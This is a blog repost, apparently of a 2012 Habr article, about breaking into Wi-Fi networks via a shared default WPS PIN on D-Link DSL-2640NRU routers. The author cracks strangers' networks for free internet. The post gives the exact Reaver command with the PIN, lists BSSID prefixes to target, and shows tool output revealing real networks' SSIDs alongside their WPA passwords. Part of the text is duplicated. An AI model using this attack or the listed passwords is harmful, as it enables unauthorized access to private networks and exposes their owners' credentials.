[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут)

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».

 

https://habrahabr.ru/




27 сентября 2012 в 23:48

Взломать Wi-Fi за… 3 секунды

Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. И вдохновленный статьей Взломать Wi-Fi за 10 часов, я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась...

Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распространенная модель на рынке. С версией прошивки 1.0.10.
В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секунд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).

Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:

image
image

Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут)

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».

 

https://habrahabr.ru/


Последние комментарии

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
blogger